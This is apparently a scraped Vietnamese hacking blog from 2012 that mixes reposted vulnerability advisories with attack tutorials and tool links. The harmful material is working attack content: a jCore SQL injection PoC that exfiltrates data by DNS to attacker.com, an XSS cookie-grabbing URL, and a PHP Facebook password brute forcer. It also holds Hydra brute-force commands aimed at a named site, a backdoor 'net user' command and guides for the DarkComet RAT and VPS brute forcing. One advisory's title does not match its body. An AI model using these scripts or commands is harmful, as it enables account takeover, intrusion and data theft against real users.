C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\style-settings.php on line 2
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/support-plugin.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\support-plugin.php on line 3
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-image-button.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-image-button.php on line 1
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-text-button.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-text-button.php on line 1
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-video-button.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-video-button.php on line 1
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/search-popup.php
Fatal error: Call to undefined function submit_button() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\search-popup.php on line 6
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginUpload/upload-button.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginUpload\upload-button.php on line 1
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginWidget/form.php
Fatal error: Using $this when not in object context in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginWidget\form.php on line 2


# 1337day.com [2012-10-18]

WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure

By: MIN Software on: 5:22 AM

Product: jCore
Vendor: jcore.net
Vulnerable Version(s): 1.0pre and probably prior
Tested Version: 1.0pre
Vendor Notification: August 1, 2012
Public Disclosure: October 17, 2012
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-4231, CVE-2012-4232
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jCore, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks.
1) SQL Injection in jCore: CVE-2012-4232
1.1 Input passed via the "memberloginid" COOKIE parameter to /admin/index.php is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
GET /admin/?logout=1 HTTP/1.1
Cookie: memberloginid=' OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --
2) Cross-Site Scripting (XSS) in jCore: CVE-2012-4231
2.1 Input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://[host]/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27
-----------------------------------------------------------------------------------------------
Solution:
As a temporary solution upgrade to version 1.0pre2:
http://jcore.net/news/jcore-ver-10pre2-available-for-testing
Final fix will be available in version 1.0 soon.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23107 - https://www.htbridge.com/advisory/HTB23107 - Multiple vulnerabilities in jCore.
[2] jCore - http://jcore.net/ - jCore is a free and open source content management system (CMS) written in PHP and distributed under the GNU General Public License.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------


# 1337day.com [2012-10-18]

jCore 1.0pre Cross Site Scripting / SQL Injection

By: MIN Software on: 5:20 AM

Wednesday, October 17, 2012

Việc bảo mật các thông tin và tài khoản cá nhân khi sử dụng internet luôn là vấn đề được coi trọng. Tuy nhiên đôi khi vì nhiều lý do nào đó, các tài khoản Gmail, Yahoo hay Facebook của bạn bị lộ mật khẩu và bị một kẻ lạ mặt ghé thăm, tuy nhiên không để lộ dấu vết gì. Nếu may mắn bạn hoàn toàn có thể kịp thời phát hiện và ngăn chặn các hành vi đăng nhập trái phép này. Chỉ với một vài thủ thuật nhỏ, bạn có thể phát hiện có người đã sử dụng tài khoản Gmail, Yahoo hay Facebook của mình.
ĐỌC TIẾP »

Cách nhận biết tài khoản Gmail, Yahoo, FB bị người khác sử dụng

By: MIN Software on: 10:39 PM



 <?php
$id = "Tên đăng nhập";
$password = "Điền pass vào đây";
$victimid = "Nick người muốn gửi";
$mesaj = "tin nhắn";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://mlogin.yahoo.com/w/login/logout%3B_ylt=A2KL8zKv4FJQe0cAaA0c8tw4?_done=%2F%3F_cache%3D1347608751&_httpHost=m.yahoo.com&c=Y83.FJ.zUcd&.intl=en&.lang=en');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
curl_exec($ch);
curl_close ($ch);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://m.yahoo.com/w/bp-messenger/messenger/?.intl=en-us&.lang=en-us&c=Y83.FJ.zUcd');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
$data = curl_exec($ch);
$_done = substr($data, strpos($data, "_done") + 14);
$_done = substr($_done, 0, strpos($_done, "\""));
$_crumb = substr($data, strpos($data, "_crumb") +15);
$pieces = explode('"', $_crumb);
$_crumb = $pieces[0];
$_ts = substr($data, strpos($data, "_ts") +12);
$pcc = explode('"', $_ts);
$_ts = $pcc[0];
$action = substr($data, strpos($data, "action=") + 8);
$acc = explode('"', $action);
$action = $acc[0];
curl_close ($ch);
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, urldecode($action));
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS ,"_authurl=auth&_done=" . $_done . "&_sig=&_src=&_ts=" . $_ts . "&_crumb=" . $_crumb . "&_pc=&_send_userhash=0&_appdata=&_partner_ts=&_is_ysid=0&_page=secure&_next=nonssl&id=" . $id . "&password=" . $password . "&__submit=Sign+In");
$data2 = curl_exec($ch);
curl_close ($ch);
$s = substr($data2, strpos($data2, "<a href=\"/w/bp-messenger/sendmessage?c"));
$ccc = explode('"', $s);
$s = $ccc[1] ;
$s = "http://m.yahoo.com$s";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $s);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
$data = curl_exec($ch);
$s = substr($data, strpos($data, "<form action=\"/w/bp-messenger/chat/sendIm?"));
$ccc2 = explode('"', $s);
$s = $ccc2[1] ;
$s = "http://m.yahoo.com$s";
curl_close ($ch);
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $s);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS ,"fr=sm&id=".$victimid."&message=".$mesaj."&_submit=Send");
$data2 = curl_exec($ch);
curl_close ($ch);
if (strpos($data2, $mesaj) !== false) {
echo "$victimid --> <font color=\"green\"> Sent </font>";
} else {
echo "$victimid --> <font color=\"red\"> Failed </font>";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://mlogin.yahoo.com/w/login/logout%3B_ylt=A2KL8zKv4FJQe0cAaA0c8tw4?_done=%2F%3F_cache%3D1347608751&_httpHost=m.yahoo.com&c=Y83.FJ.zUcd&.intl=en&.lang=en');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "/cookie.txt");
curl_exec($ch);
curl_close ($ch);
?>

[Share] PHP Yahoo Messenger Send PM

By: MIN Software on: 12:20 PM
Để làm được cái điều này thì yêu cầu phải là ngươi kiên nhẫn, nếu bạn không kiên nhẫn thì tắt đi đừng nên đọc tiếp mất thời gian

Để sử dụng tuyệt chiêu mò pass thần chưởng các bạn phải luyện 2 môn võ công sau đây:
1/ Vnc_scanner : http://adf.ly/FMw6S
2/ Dubrute : http://adf.ly/FMw8X
ĐỌC TIẾP »

[TUT] Hack VPS (Brute Force)

By: MIN Software on: 12:16 PM

[TUT] 0-day Internet Explorer MS12_063

By: MIN Software on: 12:05 PM
+ Dork dành cho những ai muốn tìm kiếm:

inurl:infernoshout
inurl:infernoshout.php
+ Cuối dùng là file hiển thị thông báo lỗi:
=> domain victim /infernoshout/engine/inferno_shout.php

VD: http://www.vietvbb.vn/up/infernoshou...erno_shout.php
=> Fatal error: Class 'infernoshout_engine' not found in D:\Domains\vietvbb.vn\www\up\infernoshout\engine\inferno_shout.php on line 23

Nguồn: XgR.

Inferno Shout Chatbox - Full Path Disclosure Vulnerability

By: MIN Software on: 11:18 AM
Có thể phân thành 4 dạng như sau:

1) Reconnaissance attacks:

Bước đầu hacker ping đến tằm nhắm để xác định địa chỉ IP đích. Sau đó, hacker xác định những port cũng như những dịch vụ đang “sống” trên địa chỉ IP đó.
Từ những thông tin này, hacker bắt đầu xác định được dạng và phiên bản của hệ điều hành. Hacker tiến hành đánh cắp dữ liệu hoặc phá huỷ hệ điều hành của mạng.
Các hình thức tấn công dạng này bao gồm: packet sniffers, port scans, ping sweeps, internet information queries.
ĐỌC TIẾP »

Các hình thức tấn công mạng

By: MIN Software on: 11:11 AM

Sunday, October 14, 2012

Chào anh em, để không mất thời gian nạp thẻ bằng tay cho các gamer, minh gui các anh em đoạn code auto nạp thẻ cho các game online, hệ thống xử lý hoàn toàn tự động, sau khi thành viên nạp thẻ thành công thì đồng sẽ được cộng cho thành viên và anh em có thể đặt lệnh rút tiền mặt ngay.
Code này có hỗ trợ thẻ viettel, mobi, vina, gate, vcoin
Dưới đây là link dowload:

Đối với PHP: http://adf.ly/FMvhf
Đối với dotnet: http://adf.ly/FMvih

Code auto nạp thẻ cào

By: MIN Software on: 1:36 PM
Auto Clicker 3.0 | Juno_okyo's Blog

Free Mouse Auto Clicker 3.0

Free Mouse Auto Clicker 3.0 là phần mềm giúp bạn tự động click (Auto Click) vào 1 nơi bất kỳ trên màn hình mà không cần phải ngồi bấm chuột.
ĐỌC TIẾP »

Auto Clicker 3.0

By: MIN Software on: 1:28 PM
Mình download trên mạng có thể dính em bé mọi người thấy thích thì download về dùng


Tool scan XSS | Juno_okyo's Blog


http://adf.ly/FMvUG
Pass download: vhb

[Software] Tool Scan XSS

By: MIN Software on: 1:24 PM
Như các bạn đã biết Y!m có một chế độ Lưu trữ tin nhắn "Message Archive" và thiết lập mặc định của chức năng này là Lưu trữ và xóa mỗi khi thoát Y!m. Vì thế chúng ta sẽ lợi dụng khe hở này để trộm nội dung chat.
ĐỌC TIẾP »

Theo dõi nội dung Y!M của người khác từ xa

By: MIN Software on: 1:22 PM

Saturday, October 13, 2012

Encrypt = Decrypt all in one Dec0der_2012

Virus Scan Report:
Virustotal.com
Download Link:
Click Here

Encrypt = Decrypt all in one Dec0der_2012

By: MIN Software on: 11:54 AM
First execute command on shell >

Code:
net user l33t p4$sword /add
l33t=username p4$sword=password

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution the shell will give you a result like this :
ĐỌC TIẾP »

[TUT] Hacking VPS/RDP From Shell

By: MIN Software on: 11:47 AM
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


Install havij and replace admins.txt in C:\Program Files\Havij with one I am giving you.

Admin Page finder List for Havij [BIG LIST]

By: MIN Software on: 11:43 AM
Step one:
Download ActivePerl, but clicking the link below:

Code:
http://downloads.activestate.com/ActivePerl/releases/5.10.1.1007/ActivePerl-5.10.1.1007-MSWin32-x64-291969.msi
Step two:
After the installation will several folders be created in the C:\ (I'm assuming you all who read this tutorial use Windows But don't mind those folders, they are sorta "useless" for your kinda use of Perl.

Step three:
Go find a perl exploit script, then put the exploit in notepad and save it in C:\exploit.pl

Step four:
Now to actually run the script. Go to "START" and then press "RUN", when you are in "RUN", write "CMD" to get into the "COMMAND PROMPT". When you open it you usually start in "DOCUMENTS AND SETTINGS", write "CD\" to get to C.\. Then write exploit.pl to start the script. (You will get further description, when you run the script)

This will be useful later on when you start using xploits!

How to execute PERL(pl) exploits?

By: MIN Software on: 11:33 AM
Hello Guyz,

I've seen many people using Darkcomet more and more nowadays. Therefore I have decided to make a good tutorial...

Things you will need:
No-ip Duc
Proxpn
Darkcomet
ĐỌC TIẾP »

Setting Up Darkcomet V 4.0 with No-ip [No Port Forwarding]

By: MIN Software on: 11:30 AM
  1. clear: làm sạch cửa sổ dòng lệnh
  2. ls tenthumuc: Liệt kê nội dung bên trong một thư mục
  3. cat tentaptin: Hiển thị nội dung của một tập tin lên cửa sổ dòng lệnh
  4. rm tentaptin: Xóa một tập tin
  5. cp taptinnguon taptindich: Sao chép một tập tin
  6. passwd: Đổi mật khẩu
  7. motd: Thông điệp của ngày
  8. finger tentruycap: Chương trình tìm kiếm thông tin người dùng
  9. startx: Khởi động X Window System server
  10. less tentaptin hoặcr more tentaptin: Hiển thị nội dung một tập tin trong cửa sổ dòng lệnh một trang mỗi lần
  11. info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
  12. lpr tentaptin: Gửi tập tin tới máy tin
  13. grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
  14. head tentaptin: Hiển thị 10 dòng đầu tiên của tập tin
  15. tail tentaptin: Hiển thị 10 dòng cuối cùng của tập tin
  16. mv tentaptincu tentaptinmoi: Di chuyển hoặc đổi tên tập tin
  17. file tentaptin: Hiển thị thông tin về nội dung của tập tin
  18. echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh
  19. date: Hiển thị ngày và giờ hiện tại
  20. cal: Hiển thị lịch
  21. gzip tentaptin: Nén một tập tin
  22. gunzip tentaptin: Giải nén một tập tin
  23. which lenh: Hiển thị đường dẫn tới lệnh
  24. whereis lenh: Hiển thị đường tới nơi chứa lệnh
  25. who: Hiển thị các người dùng đã đang nhập
  26. finger tentruycap@maychu: Thu thập thông tin chi tiết về người dùng hiện đang dùng hệ thống
  27. w: Hiễn thị người dùng đã đăng nhập với các tiến trình sử dụng
  28. mesg y/n: Đặt tùy chọn để các người dùng khác viết thông điệp cho bạn
  29. write nguoidung: Gửi tin nhắn cho người dùng khác
  30. talk nguoidung: Cho phép 2 người chat với nhau
  31. chmod quyen tentaptin: Thay đổi quyền truy cập tập tin
  32. mkdir tenthumuc: Tạo một thư mục
  33. rmdir tenthumuc: Xóa một thư mục rỗng
  34. ln existingfile new-link: Tạo một đường dẫn tới một tập tin (liên kết cứng)
  35. df: Hiển thị tất cả các mount của hệ thộng
  36. top: Hiển thị danh sách các tiến trình đang chạy
  37. tty: Hiển thị tên của cửa sổ dòng lệnh mà trên đó lệnh được dùng
  38. kill PID hoặc số %job: Ngừng một tiến trình bằng số PID (Process Identification Number) hoặc số công việc
  39. jobs: Hiển thị một danh sách các công việc hiện tại
  40. netstat: Hiển thị các kết nối mạng

50 câu lệnh Linux phải nhớ

By: MIN Software on: 10:00 AM
Với 10 ứng dụng chạy ngay không cần cài này, bạn gần như đã có cả một chiếc máy tính đầy đủ những ứng dụng hữu ích được gói gọn chỉ trong một thanh nhớ USB.

Thanh nhớ USB hiện nay đã trở thành một phần không thể thiếu trong cuộc sống của bạn. Chỉ với một khoảng đầu tư dưới 2 triệu đồng, bạn đã có ngay một kho lưu trữ gọn nhẹ có thể mang theo đến bất kỳ đâu với dung lượng 64GB.

Ngoài việc dùng để lưu trữ dữ liệu, USB còn có thể sử dụng như một đĩa cứu hộ Windows hay một kho chứa các ứng dụng không cần cài đặt (portable). Tuy có khá nhiều mục đích sử dụng hữu ích, nhưng phạm vi bài viết này chỉ đề cập đến những ứng dụng portable hữu ích nên có trên một thanh nhớ USB.

ĐỌC TIẾP »

10 ứng dụng portable nên có trên USB

By: MIN Software on: 9:08 AM
Tool này mình thấy scan link admin tốt hơn mấy tool trước đây chúng ta xài. Đây là tool mới cho anh em dùng thử.
Đây là demo:
[Hình: 11.PNG]

[Hình: 22.PNG]

P/S: bạn hãy thử 1 site trước đây bạn chưa tìm ra link admin và thử với tool này xem.

Link download:
http://adf.ly/FMudy

1337 Admin page finder

By: MIN Software on: 1:46 AM

Friday, October 12, 2012


###############################
# Face Book Brute Forcer
################################
#Miracle-Ubers.org
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list


function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}


}


if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line

";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line

";}
}
?>

[PHP] Facebook Brute force

By: MIN Software on: 11:41 PM

Wednesday, October 10, 2012

FrameiFrames and script tags are being used by malicious hackers to serve up drive-by internet attacks, silently and invisibly.
iFrames allow webmasters to embed the content of one webpage into another, seamlessly.
There are legitimate reasons why some websites may want to do that - but what cybercriminals do is exploit the functionality (presumably they have been able to gain write access to the website) to deliver malware such as fake anti-virus or a PDF vulnerability exploit to infect your computer.
What's sneaky is that malicious hackers can make the embedded content invisible to the naked eye, by making the window zero by zero pixels in size. You can't see the threat, but your web browser is still dragging it down.
ĐỌC TIẾP »

Invisible iFrame drive-by malware attacks explained [VIDEO]

By: MIN Software on: 8:35 PM
* Chuẩn bị:
* Tutorial:
Tutorial by Juno_okyo's Blog.

[TUT] Flagfox Action - Reverse IP

By: MIN Software on: 7:59 PM
Các file log của cPanel được lưu tại thư mục /usr/local/cpanel/logs/, gồm có các file chính sau:
access_log: log truy cập của cPanel và WHM.
error_log: log các lỗi của cPanel và WHM.
login_log: log các đăng nhập cPanel và WHM.

Ngoài ra cPanel còn lưu log hệ thống tại thư mục /var/log/, gòm có
bandwidth: log lưu lượng băng thông sử dụng của server.
chkservd.log: log hệ thống theo dõi các dịch vụ trên server.
clamav: log của hệ thống quét virus clamav.
cpupdate: log tác vụ nâng cấp của cPanel.
exim_mainlog: log gửi/nhận thư của hệ thống mail exim.
exim_rejectlog: log các kết nối bị từ chối của exim.
exim_paniclog: log các lỗi của exim.
maillog: log các đăng nhập và kết nối gửi/nhận thư của các dịch vụ mail (pop3/imap).
xferlog: log các kết nối qua FTP.

Ngoài ra, log của các tài khoản được lưu trữ trong thư mục /usr/local/cpanel/domlogs/ log của Apache được lưu tại /usr/local/apache/logs/

Log file của cPanel

By: MIN Software on: 8:25 AM

Tuesday, October 9, 2012

Juno_okyo's Blog
Hitesh Malviya is one of foremost it security expert of India released his first book on hacking named “Hackdecoders v 1.0”. This book will be proved campact bomb for beginners. Both basic and advanced hacking topics are covered with images in this book.

The book is having chapters on facebook hacking, google hacking, clickjacking, website hacking and much more as to guide people as how to find solutions to all these problems.

He is a young entrepreneur started his venture hcf infosec pvt. Ltd. working in it security domain from last 2 years. Hitesh has been frequent speaker for international conference defcon India chapters.

The book is released online and available on www.hcf.co.in for download. He is planning for next version of this book, Hopefully will be come up with next version by end of this year. 
Table of contents:
:: Introduction to Ethical Hacking
:: Information Gathering & footprinting
:: Scanning & Enumeration
:: Trojans and Backdoors
:: System Hacking
:: Google Hacking(Basic & advanced)
:: Sql injection and countermeasures
:: Cross site scripting and Countermeasures
:: Remote & Local File inclusion and Countermeasures
:: Email account cracking & security
:: Facebook Clickjacking
:: VPN & Proxies
:: Hacking Mobile Phones, PDA, Handheld devices
:: Computer Forensic & Incident Handling
:: Career certifications in Information Security
DOWNLOAD LINK:- CLICK HERE

HACK DECODER BOOK BY HITESH MALVIYA

By: MIN Software on: 2:34 PM

Monday, October 8, 2012

Các tùy chọn:

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Để brute force được form thì service chọn http-{get|post}-form chọn phương thức cho phù hợp(GET|POST).

Cú pháp:hydra -l {username} -P {password list path} -s {port} -f {Site Address} http-post-form "{Path to postback page}:{USERNAME_NAME}=^USER^&{PASSWORD_NAME}=^PASS^:{failed login text

VD:
Victim sử dụng phương thức POST
<form method="POST">
<input type="text" name="user" />
<inbut ... name="pass" />
<input type="submit" name="login" />
</form>


user=(user input)
pass=(user input)
submit=Login

hydra -l admin -P dictionary.txt vietmatrix.com http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:đăng nhập sai!"

Brute force http forms (tool :Hydra)

By: MIN Software on: 3:27 PM
Các bạn có thể download 1 bộ từ điển ở đây : Users --- Pass

List User & Pass for Brute Force

By: MIN Software on: 3:23 PM
Video mô tả tấn công XSS (Cross Site Scripting), video mô tả rất chi tiết.

Link download:
http://adf.ly/FMu2Z
Pass giải nén nếu có: vietmatrix.net

Chúc các bạn nghiên cứu thành công và vui vẻ.

Nguồn OWASP.

Video mô tả tấn công XSS

By: MIN Software on: 2:45 PM

Demo khai thác bug XSS

By: MIN Software on: 2:40 PM
Một trong những kĩ thuật hay được các hacker sử dụng để thâm nhập vào mạng của bạn đó là Đoán (thử) password. Kĩ thuật này được sử dụng cả trong mạng nội bộ cũng như kết nối từ xa từ 1 mạng khác. Trong bài này chúng ta sẽ tìm hiểu cách các hacker sử dụng các công cụ để hack password của hệ thống Terminal Server và cách chống lại kĩ thuật này.
ĐỌC TIẾP »

Tấn công hệ thống Terminal Server bằng kĩ thuật Brute Force Hacking

By: MIN Software on: 2:17 PM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com